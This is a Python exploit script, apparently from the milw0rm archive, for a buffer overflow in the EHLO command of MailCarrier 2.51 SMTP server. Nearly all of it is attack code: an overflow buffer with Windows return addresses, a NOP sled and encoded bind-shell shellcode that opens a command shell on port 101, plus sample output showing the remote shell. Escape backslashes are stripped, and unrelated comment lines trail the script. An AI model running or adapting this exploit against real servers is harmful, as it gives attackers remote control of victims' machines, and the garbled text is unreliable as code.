#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:datatools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:WINNTsystem32> #
#########################################################
import struct
import socket
print "nn###############################################"
print "nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "nFound & coded by muts [at] whitehat.co.il"
print "nFor Educational Purposes Only!n"
print "nn###############################################"
def make_overflow_dummy(overflow_len, retaddr):
return 'A' * overflow_len + struct.pack('<L', retaddr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "xEB"
sc2 += "x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
sc2 += "xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
sc2 += "xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
sc2 += "x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
sc2 += "xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
sc2 += "x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
sc2 += "xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
sc2 += "x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
sc2 += "x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
sc2 += "x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
sc2 += "x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
sc2 += "xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
sc2 += "xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
sc2 += "xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
sc2 += "xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
sc2 += "x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
sc2 += "x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
sc2 += "xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
sc2 += "x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
sc2 += "x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
sc2 += "x58x68x61x63x6Bx90"
# Change RET address as need be.
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + 'x90' * 32 + sc2 # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + 'x90' * 32 + sc2 #RET WinXP SP2 ENG
try:
print "nSending evil buffer..."
s.connect(('127.0.0.1',25))
s.send('EHLO ' + buffer + 'rn')
data = s.recv(1024)
s.close()
print "nDone! Try connecting to port 101 on victim machine."
except:
print "Could not connect to SMTP!"
# milw0rm.com [2004-10-26]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666